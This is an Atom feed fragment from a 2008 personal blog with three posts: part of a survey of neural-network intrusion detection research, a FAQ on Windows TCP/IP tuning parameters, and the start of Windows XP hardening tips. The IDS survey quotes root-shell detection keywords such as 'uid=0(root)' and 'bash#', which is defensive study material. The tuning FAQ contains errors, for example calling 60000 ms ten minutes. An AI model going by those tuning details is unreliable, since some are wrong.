style=";font-family:Arial;font-size:10;"  &gt;frequent false-alarm detection&lt;/span&gt; &lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;the need to specify a signature of the attack, and then to update the attack signatures on every IDS tool. 
A signature of      an attack may not be easily discovered.&lt;/span&gt; &lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;new attack signatures are not automatically      discovered without update of the IDS&lt;/span&gt; &lt;/li&gt;&lt;/ul&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;b&gt;&lt;i&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Approaches for anomaly detection&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Anomaly Detection in Network-based or Host-based IDS includes :&lt;/span&gt; &lt;/p&gt;  &lt;ul type="disc"&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;threshold detection detecting abnormal      activity on the server or network, for example abnormal consumption of the      CPU for one server, or abnormal saturation of the network&lt;/span&gt; &lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;statistical measures, learned from historical      values&lt;/span&gt; &lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;rule-based measures, with expert systems&lt;/span&gt; &lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;non-linear algorithms such as Neural Networks or      Genetic algorithms&lt;/span&gt; &lt;/li&gt;&lt;/ul&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;The common approach for anomaly detection concerns the statistical analysis, where the user or the system behavior is measured by a number of variables over the time. These variables may be the login and the logout time of each session, the amount of resources consumed during the session, and the resource duration. 
The major limitation of this approach is to find a correct threshold without frequent false-alarm detection.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;b&gt;&lt;i&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;DARPA Intrusion Detection Data Base&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;To improve performances of IDS systems with real network traffic, a large-scale realistic Intrusion Detection data-base has been sponsored by the US Defense Advanced Research Projects Agency ( DARPA ) in 1998. More than two months of traffic observed from US Government sites and the Internet were registered, adding attacks against various hosts OS. DARPA data-base was then designed to evaluate performances of Intrusion Detection Systems. The first evaluation with off-line and real-time Data Base was conducted in the summer of 1998 [5].&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;b&gt;&lt;i&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Neural Network approach for Intrusion Detection&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;One promising research in Intrusion Detection concerns the application of the Neural Network techniques, for the misuse detection model and the anomaly detection model. 
Performance evaluations presented in this paper all refer to the DARPA Intrusion Data Base.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;strong&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Neural Network approach&lt;/span&gt;&lt;/strong&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;An artificial Neural Network consists of a collection of treatments to transform a set of inputs to a set of searched outputs, through a set of simple processing units, or nodes and connections between them. Subsets of the units are input nodes, output nodes, and nodes between input and output form hidden layers ; the connection between two units has some weight, used to determine how much one unit will affect the other. Two types of architecture of Neural Networks can be distinguished :&lt;/span&gt; &lt;/p&gt;  &lt;ul type="disc"&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Supervised training algorithms, where in the      learning phase, the network learns the desired output for a given input or      pattern. The well known architecture of supervised neural network is the      Multi-Level Perceptron (MLP) ; the MLP is employed for Pattern      Recognition problems.&lt;/span&gt; &lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Unsupervised training algorithms, where in the      learning phase, the network learns without specifying desired output.      Self-Organizing Maps ( SOM ) are popular unsupervised training      algorithms ; a SOM tries to find a topological mapping from the input      space to clusters. SOM are employed for classification problems.&lt;/span&gt; &lt;/li&gt;&lt;/ul&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;A good introduction to Neural Networks is available in [6]. 
The most important property of a Neural Network is to automatically learn / retrain coefficients in the Neural Network according to data inputs and data outputs. Applying the Neural Network (NN) approach to Intrusion Detection, we first have to expose NN to normal data and to attacks to automatically adjust coefficients of the NN during the training phase. Performance tests are then conducted with real network traffic and attacks.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Neural Networks have been largely employed with success for complex problems such as Pattern Recognition, hand-written character recognition, Statistical Analysis. We present four recent studies on the application of the Neural Network approach to the scope of Intrusion Detection, both for the misuse detection model and the anomaly detection model.&lt;/span&gt;&lt;/p&gt;  &lt;span style=";font-family:Arial;font-size:10;"  &gt; Representation of a Perceptron with one Hidden Layer ( from [8] )&lt;/span&gt;&lt;br /&gt;&lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;u&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Georgia University neural network IDS&lt;/span&gt;&lt;/u&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;J Cannady and J Mahaffey [7] of Georgia Technical Research Institute (GTRI ) conducted research to apply Multi-Level Perceptron (MLP) model and MLP/SOM (Self-Organizing Maps) for misuse detection.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;The MLP prototype had these characteristics : 4 fully connected layers, 9 input nodes and 2 output nodes ( normal and attack ). 
With this prototype, they simulated specific attacks as ISS scans, SATAN scans and SYNFlood, and each attack was clearly identified through normal traffic.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;A MLP/SOM prototype was then designed to detect dispersed and possibly collaborative attacks. Neural Network was a feed-forward network with back-propagation learning. In the learning phase, Neural Network converged rapidly. Preliminary results with unsuccessful FTP login attempts where correctly identified as attacks.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;u&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;MIT research in neural network IDS&lt;/span&gt;&lt;/u&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;R Lippmann and R Cunningham [8, 9] of the MIT Lincoln Laboratory also conducted tests applying Neural Networks to misuse detection model, by searching for attack-specific keywords in the network traffic. They used a Multi-Level Perceptron (MLP) to detect Unix-host attacks, and attacks to obtain root-privilege on a server. Generic keywords are selected to detect attack preparations and actions executed after.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;A two-layer perceptron was designed with k input nodes, 2k hidden nodes and 2 outputs ( normal and attack ) ; backpropagation in the learning phase detects weights of the Neural Network. 
Good detection performance was obtained with 30 keywords to detect attacks, such as « cat &gt; », « uudecode » or a new root shell (« uid=0(root) », « bash# »).&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Applied to Shell source code with 7 shell-commands representing an attack, 17 out of 20 attacks were detected and one false alarm generated ; applied to C source code with 2 features, 68 of 73 attacks were detected, with 4 false alarms.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;With the Neural Network approach, false alarms were reduced by two orders of magnitude ( to roughly one false alarm per day ) and the detection rate increased to roughly 80 % with the DARPA database. The system could detect old as well as new attacks not included in the training data, and to a lesser extent attacks distributed across multiple sessions.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;u&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;UBILAB Laboratory&lt;/span&gt;&lt;/u&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Luc Girardin of the UBILAB laboratory [10, 11] also employed Self-Organizing Maps ( SOM ) to perform clustering of network traffic and detect attacks based upon Neural Network, associated with a visual approach of network traffic. SOM are employed to project network events on an appropriate 2D-space for visualization, and then they are displayed to the Network Administrator with a comprehensive view of traffic. 
Intrusions are then easily extracted from this view, by highlighting divergence from the norm with visual metaphors of network traffic.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Girardin tested this approach with success for the following attacks : IP spoofing, FTP password guessing, network scanning and network hopping ; log files from firewalls are analyzed. However, this approach needs a visual interpretation of network traffic by an administrator to detect attacks.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;u&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Research of RST Corporation&lt;/span&gt;&lt;/u&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;A Ghosh and A Schwartzbard [12] of Reliable Software Technologies Corp. used the Neural Network approach for the anomaly detection model by analyzing program behavior profiles for Intrusion Detection. Program behavior profiles are built by capturing system calls made by the program, to monitor the behavior of programs by noting irregularities in program behavior.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Their IDS was a single hidden layer Multi-Layer Perceptron (MLP) ; they also employed the so-called Leaky Bucket algorithm to retain a temporal memory of recent abnormal events, by managing a counter : for a normal output, the counter tends to be zero, and for an anomaly the counter tends to be one.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Performance for their system was tested with the DARPA data-base, including intrusive and non-intrusive sessions. 
Applied to anomaly detection, the system detects known and new attacks with good performance ( 77 % of attacks were detected with 3 % of false alarms ), but applied to misuse detection it detects attacks with high false alarm rates, which rules it out for commercial use. In 1998, with the DARPA off-line IDS evaluation, the system successfully detected User-to-Root attacks composed of system-call sequences.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;In order to improve the anomaly detection model, A Ghosh et al. [13] then applied Intrusion Detection to another Neural Network topology, the Elman Network, for recognizing recurrent features in program execution traces. An Elman Network is based on a feed-forward topology with the addition of context nodes retaining information from previous inputs. Applied to the DARPA database, the Elman Networks were able to detect 77 % of attacks with &lt;b&gt;no false alarm&lt;/b&gt;, improving results obtained with the MLP topology.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;In 1999, during the evaluation of performance tests with other systems and applying the DARPA data-base, this system had promising results with anomaly detection to detect new attacks.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin: 0cm 0cm 0.0001pt;"&gt;&lt;b&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;Conclusion&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;  &lt;span style=";font-family:Arial;font-size:10;"  &gt;Intrusion Detection Systems are becoming widely employed as a fundamental Network Security system. 
Commercial tools available today have limitations in detecting real intrusions, and the Neural Network is an efficient way to improve the performance of IDS systems which are based on the misuse detection model and the anomaly detection model.&lt;/span&gt;</content><link rel='replies' type='application/atom+xml' href='http://enaq.blogspot.com/feeds/8107702510982510456/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8591117055296439835&amp;postID=8107702510982510456' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8591117055296439835/posts/default/8107702510982510456'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8591117055296439835/posts/default/8107702510982510456'/><link rel='alternate' type='text/html' href='http://enaq.blogspot.com/2008/03/application-of-neural-networks-to.html' title='Application of Neural Networks to Intrusion Detection'/><author><name>Deni's Blog</name><uri>http://www.blogger.com/profile/08351452297355526383</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='11' src='http://bp0.blogger.com/_ODxpL5cDIW8/R_GyiGm5q3I/AAAAAAAAACg/cN72rF5eUzo/S220/08012006(004)_filtered.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8591117055296439835.post-4305897499541149229</id><published>2008-03-25T11:53:00.000-07:00</published><updated>2008-03-25T12:47:49.094-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Tips dan trik komputer'/><title type='text'>FAQ - Frequently asked questions about Network parameters optimized by SpeedConnec</title><content type='html'>&lt;p 
class="MsoNormal"&gt;&lt;b&gt;&lt;u&gt;&lt;span style="color: rgb(51, 51, 51);font-family:Arial;font-size:10;"  &gt;Maximum Transmission Unit (MTU)&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;span style="color: rgb(51, 51, 51);font-family:Arial;font-size:10;"  &gt;&lt;br /&gt;This is the default packet size that Windows uses to negotiate with. When a connection is opened between two computers, they must agree on an MTU. This is done by comparing MTUs and selecting the smaller of the two. If the MTU is set too large for routers that are between the computers, these routers then fragment this information into a packet size that the router can handle. This fragmentation can double the amount of time it takes to send a single packet. Windows has a built-in MTU Discovery that will adjust for this by sending out a packet that is marked as "Not Fragmentable". Then the router sends back an error to the computer saying that the packet was too large, and Windows then lowers the MTU until there are no more errors. If your ISP uses an MTU of 576, then every time you start a connection, Windows must adjust down to this value. Even though Windows automatically adjusts the packet size, it still takes it time to negotiate an acceptable MTU. By setting this value manually, you greatly reduce the amount of work that Windows must do to negotiate.&lt;br /&gt;&lt;br /&gt;&lt;a name="mss"&gt;&lt;/a&gt;&lt;b&gt;&lt;u&gt;Maximum Segment Size (MSS) &lt;/u&gt;&lt;/b&gt;&lt;br /&gt;Maximum Segment Size defines the largest segment of data that the TCP stack is prepared to receive. When a connection is established, the two ends agree to use the smaller of each end's value. 
MSS is generally 40 bytes less than Maximum Transmission Unit, because 40 bytes are used for the TCP and IP headers.&lt;br /&gt;&lt;br /&gt;&lt;a name="rwin"&gt;&lt;/a&gt;&lt;b&gt;&lt;u&gt;TCP Receive Window Size (RWIN)&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;The TCP Receive Window Size is the amount of receive data (in bytes) that can be buffered at one time on a connection. The sending host can send only that amount of data before waiting for an acknowledgment and window update from the receiving host. A value that's too large will result in greater loss of data if packets are lost or damaged, and a value that's too small will slow down data transfer considerably, as each packet will have to be acknowledged before the next packet is sent. Matching the receive window to even increments of the MSS increases the percentage of full-sized TCP segments utilized during bulk data transmission.&lt;br /&gt;&lt;br /&gt;&lt;a name="ttl"&gt;&lt;/a&gt;&lt;b&gt;&lt;u&gt;Time To Live (TTL)&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;This parameter specifies the default Time To Live (TTL) value that is set in the header of outgoing IP packets. The TTL determines the maximum time that an IP packet can live in the network without reaching its destination. It is effectively a limit on the number of routers an IP packet can pass through before it is discarded.&lt;br /&gt;&lt;br /&gt;&lt;a name="kat"&gt;&lt;/a&gt;&lt;b&gt;&lt;u&gt;Keep Alive Time &lt;/u&gt;&lt;/b&gt;&lt;br /&gt;Specifies how often to send session keepalive packets on active sessions. This will keep connections that have stalled during a particular download session from timing out. The minimum is 1 minute (60000 ms). 
Recommended setting is 10 minutes (600000 ms).&lt;br /&gt;&lt;br /&gt;&lt;a name="pmtuBHD"&gt;&lt;/a&gt;&lt;b&gt;&lt;u&gt;Path MTU - Enable Black Hole Detect &lt;/u&gt;&lt;/b&gt;&lt;br /&gt;This specifies whether the stack will attempt to detect Maximum Transmission Unit (MTU) routers that do not send back ICMP fragmentation-needed messages. ICMP (Internet Control Message Protocol) is defined in STD5, RFC 792. With this feature enabled, TCP will try to send segments without the Don't Fragment bit set if several re-transmissions of a segment go unacknowledged. If the segment is acknowledged as a result, the MTU will be decreased and the Don't Fragment bit will be set in future packets on the connection. Enabling black hole detection increases the maximum number of re-transmissions performed for a given segment. Setting this parameter when it is not needed can cause performance degradation. However, if the router is not sending back the ICMP messages, then PMTU Discovery will not work. This can cause an even greater loss of performance. PMTU Black Hole Detect is recommended to be disabled.&lt;br /&gt;&lt;br /&gt;&lt;a name="pmtuAD"&gt;&lt;/a&gt;&lt;b&gt;&lt;u&gt;Path MTU - Enable Auto Discovery&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;Enabling this setting causes TCP to attempt to discover the Maximum Transmission Unit (MTU or largest packet size) over the path to a remote host. By discovering the Path MTU and limiting TCP segments to this size, TCP is supposed to be able to eliminate fragmentation at routers along the path that connect networks with different MTUs. This requires implementation of the corresponding server side algorithm, however, and presupposes all of the servers on the entire Internet only running MSFT server software with server-side optimization features accessible from MSFT web-browser client software. Needless to say, this is rather unlikely. 
Nevertheless, it is not recommended to disable this setting as it would then cause an MTU of 576 bytes to be used for all connections that are not to machines on the local subnet. Disabling this setting can cause severe performance degradation because fragmentation may not be compensated for. PMTU Auto Discovery is recommended to be enabled.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;span style="color: rgb(51, 51, 51);font-family:Arial;font-size:10;"  &gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;a name="sack"&gt;&lt;/a&gt;&lt;b&gt;&lt;u&gt;&lt;span style="color: rgb(51, 51, 51);font-family:Arial;font-size:10;"  &gt;Enable Selective Acknowledgements (SACK) &lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;span style="color: rgb(51, 51, 51);font-family:Arial;font-size:10;"  &gt;&lt;br /&gt;This parameter controls whether or not Selective Acknowledgment (SACK) support, as specified in RFC 2018, is enabled. Selective Acknowledgement (SACK) is an optimizing feature that lets you acknowledge receipt of individual blocks of data in a continuous sequence, rather than just the last sequence number. The recipient can tell the sender that one or more data blocks are missing from the middle of a sequence, and the sender can retransmit only the missing data.&lt;br /&gt;&lt;br /&gt;&lt;a name="maxdupack"&gt;&lt;/a&gt;&lt;b&gt;&lt;u&gt;Max Duplicate ACKs&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;This parameter determines the number of duplicate ACKs that must be received for the same sequence number of sent data before fast retransmit is triggered to resend the segment that has been dropped in transit.&lt;br /&gt;&lt;br /&gt;&lt;a name="tcpws"&gt;&lt;/a&gt;&lt;b&gt;&lt;u&gt;TCP Window Scaling (RFC 1323)&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;Receive window scaling permits TCP to negotiate a scaling factor for the TCP receive window size, allowing the use of a very large TCP receive window size (RWIN). 
This option must be enabled in order to use a receive window size (RWIN) larger than 64 KB.&lt;br /&gt;&lt;br /&gt;&lt;a name="timestamps"&gt;&lt;/a&gt;&lt;b&gt;&lt;u&gt;Timestamps (RFC 1323) &lt;/u&gt;&lt;/b&gt;&lt;br /&gt;Timestamps help TCP to measure round trip time (RTT) accurately in order to adjust retransmission timeouts. The Timestamps option provides two four-byte timestamp fields in the TCP header, one to record the time the initial transmission is sent and one to record the time on the remote host. Since this option increases packet header overhead and doesn't provide much of an improvement, it is recommended to be disabled. This option is specified in RFC 1323.&lt;br /&gt;&lt;br /&gt;&lt;a name="ska"&gt;&lt;/a&gt;&lt;b&gt;&lt;u&gt;Session Keep Alive&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;This value determines the time interval between keepalive transmissions on a session. Recommended value is 60000 ms (10 minutes).&lt;br /&gt;&lt;br /&gt;&lt;a name="MaxConectionsPerServer"&gt;&lt;/a&gt;&lt;b&gt;&lt;u&gt;Internet Explorer: MaxConnectionsPerServer &lt;/u&gt;&lt;/b&gt;&lt;br /&gt;This value limits the number of concurrent connections to a web server.&lt;br /&gt;&lt;br /&gt;&lt;a name="DisableUserTOSSetting"&gt;&lt;/a&gt;&lt;b&gt;&lt;u&gt;Quality and Type Of Service : DisableUserTOSSetting&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;This parameter can be used to allow programs to manipulate the Type Of Service (TOS) bits in the header of outgoing IP packets.&lt;br /&gt;&lt;br /&gt;&lt;a name="LANRequestBufferSize"&gt;&lt;/a&gt;&lt;b&gt;&lt;u&gt;LAN Settings : LAN Request Buffer Size&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;This parameter can be used to reduce local area network delays.&lt;br /&gt;&lt;br /&gt;&lt;a name="IncreaseLANBrowsingSpeed"&gt;&lt;/a&gt;&lt;b&gt;&lt;u&gt;LAN Settings : Increase LAN Browsing Speed&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;This option disables the network task scheduler leading to faster browsing of network folders.&lt;br /&gt;&lt;br /&gt;&lt;a 
name="HostResolutionPriority"&gt;&lt;/a&gt;&lt;b&gt;&lt;u&gt;Host Resolution Priority&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;This option group allows setting the priority level for LocalPriority (local names cache), HostsPriority (the hosts file), DnsPriority (DNS) and NetbtPriority (NetBT name resolution, WINS).&lt;br /&gt;&lt;br /&gt;&lt;a name="BcastNameQueryCount"&gt;&lt;/a&gt;&lt;b&gt;&lt;u&gt;NetBIOS over TCP/IP: BcastNameQueryCount &lt;/u&gt;&lt;/b&gt;&lt;br /&gt;This value determines the number of times NetBT broadcasts a query for a particular name without receiving a response.&lt;br /&gt;&lt;br /&gt;&lt;a name="BcastQueryTimeout"&gt;&lt;/a&gt;&lt;b&gt;&lt;u&gt;NetBIOS over TCP/IP: BcastQueryTimeout&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;This value determines the time interval between successive broadcast name queries for the same name.&lt;br /&gt;&lt;br /&gt;&lt;a name="CacheTimeout"&gt;&lt;/a&gt;&lt;b&gt;&lt;u&gt;NetBIOS over TCP/IP: CacheTimeout&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;This value determines the time interval (in milliseconds) that names are cached for in the remote name table.&lt;br /&gt;&lt;br /&gt;&lt;a name="DNSCacheParameters"&gt;&lt;/a&gt;&lt;b&gt;&lt;u&gt;DNS Cache Parameters&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;MaxNegativeCacheTTL limits the negative DNS query answer cache time. NegativeSOACacheTime limits the negative answer to SOA DNS query cache time. 
NetFailureCacheTime value determines the time to stop sending DNS queries if no answer is received.&lt;/span&gt;&lt;/p&gt;</content><link rel='replies' type='application/atom+xml' href='http://enaq.blogspot.com/feeds/4305897499541149229/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8591117055296439835&amp;postID=4305897499541149229' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8591117055296439835/posts/default/4305897499541149229'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8591117055296439835/posts/default/4305897499541149229'/><link rel='alternate' type='text/html' href='http://enaq.blogspot.com/2008/03/faq-frequently-asked-questions-about.html' title='FAQ - Frequently asked questions about Network parameters optimized by SpeedConnec'/><author><name>Deni's Blog</name><uri>http://www.blogger.com/profile/08351452297355526383</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='11' src='http://bp0.blogger.com/_ODxpL5cDIW8/R_GyiGm5q3I/AAAAAAAAACg/cN72rF5eUzo/S220/08012006(004)_filtered.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8591117055296439835.post-1007674296620538799</id><published>2008-03-25T06:09:00.000-07:00</published><updated>2008-03-25T12:50:35.441-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Tips dan trik komputer'/><title type='text'>Securing Windows</title><content type='html'>&lt;span style=""&gt;According to polls conducted by various print and electronic media, more than 90% of computer users choose 
Microsoft Windows as their operating system. &lt;/span&gt;&lt;span style="" lang="DE"&gt;This is mainly because it is easy to use and rich in features (or so they say). Yet we all know how many weaknesses have been reported in Windows and how many attacks occur, whether from hackers, viruses, trojans and their &lt;i&gt;relatives&lt;/i&gt;. That is why, in this article, Spyro offers a few tips, which you can build on yourself, for securing your Windows XP so that you can &lt;i&gt;play&lt;/i&gt; with it comfortably.&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;  &lt;p class="MsoBodyText" style="margin: 0cm 6.75pt 0.0001pt; line-height: 200%;"&gt;&lt;b&gt;&lt;span style="line-height: 200%;" lang="DE"&gt;1.&lt;/span&gt;&lt;/b&gt;&lt;span style="line-height: 200%;" lang="DE"&gt;     &lt;b&gt;NTFS PARTITION &lt;/b&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoBodyText" style="margin: 0cm 6.75pt 0.0001pt; line-height: 200%;"&gt;&lt;span style="line-height: 200%;"&gt;Install your Windows XP on an NTFS partition. Administrators need this in order to use File Permissions to restrict users' access rights. 
If your Windows XP is not installed on an NTFS partition, convert it as follows: &lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoBodyText" style="margin: 0cm 6.75pt 0.0001pt; line-height: 200%;"&gt;&lt;span style="line-height: 200%;"&gt;1)     Open a command prompt (start-&gt; run -&gt; cmd.exe) &lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoBodyText" style="margin: 0cm 6.75pt 0.0001pt; line-height: 200%;"&gt;&lt;span style="line-height: 200%;"&gt;2)     Then type &lt;b&gt;convert c: /FS:NTFS /v&lt;/b&gt; &lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoBodyText" style="margin: 0cm 6.75pt 0.0001pt; line-height: 200%;"&gt;&lt;span style="line-height: 200%;"&gt;  &lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoBodyText" style="margin: 0cm 6.75pt 0.0001pt; line-height: 200%;"&gt;&lt;b&gt;&lt;span style="line-height: 200%;" lang="DE"&gt;2.&lt;/span&gt;&lt;/b&gt;&lt;span style="line-height: 200%;" lang="DE"&gt;     &lt;b&gt;ENABLE THE BIOS PASSWORD &lt;/b&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoBodyText" style="margin: 0cm 6.75pt 0.0001pt; line-height: 200%;"&gt;&lt;span style="line-height: 200%;" lang="DE"&gt;It is very important to enable a BIOS password so that other people cannot simply boot your computer as they please. This also matters if you have Deepfreeze installed on your computer, because others could use the BIOS to hack Deepfreeze (see the earlier articles on Hacking Deepfreeze). 
&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoBodyText" style="margin: 0cm 6.75pt 0.0001pt; line-height: 200%;"&gt;&lt;span style="line-height: 200%;" lang="DE"&gt;  &lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoBodyText" style="margin: 0cm 6.75pt 0.0001pt; line-height: 200%;"&gt;&lt;b&gt;&lt;span style="line-height: 200%;"&gt;3.&lt;/span&gt;&lt;/b&gt;&lt;span style="line-height: 200%;"&gt;     &lt;b&gt;MAKE USE OF SYSKEY &lt;/b&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoBodyText" style="margin: 0cm 6.75pt 0.0001pt; line-height: 200%;"&gt;&lt;span style="line-height: 200%;"&gt;Windows XP has a security feature that asks the user to enter a password at startup. Oh, isn't a BIOS password enough? Don't forget that nowadays there are many ways for other people to hack your BIOS password. &lt;/span&gt;&lt;span style="line-height: 200%;" lang="DE"&gt;To make your computer ask for a password at startup, you can use SYSKEY: &lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoBodyText" style="margin: 0cm 6.75pt 0.0001pt; line-height: 200%;"&gt;&lt;span style="line-height: 200%;"&gt;1)     Open the syskey dialog via &lt;b&gt;start&lt;/b&gt; -&gt; &lt;b&gt;run&lt;/b&gt;, then type syskey &lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoBodyText" style="margin: 0cm 6.75pt 0.0001pt; line-height: 200%;"&gt;&lt;span style="line-height: 200%;"&gt;2)     Click &lt;b&gt;Update&lt;/b&gt;, then choose &lt;b&gt;Password Startup&lt;/b&gt; &lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoBodyText" style="margin: 0cm 6.75pt 0.0001pt; line-height: 200%;"&gt;&lt;span style="line-height: 200%;" lang="DE"&gt;3)     &lt;/span&gt;&lt;span style="line-height: 200%;"&gt;Enter your password there. When writing the password, use a key phrase that is as hard as possible to guess yet easy for you to remember. 
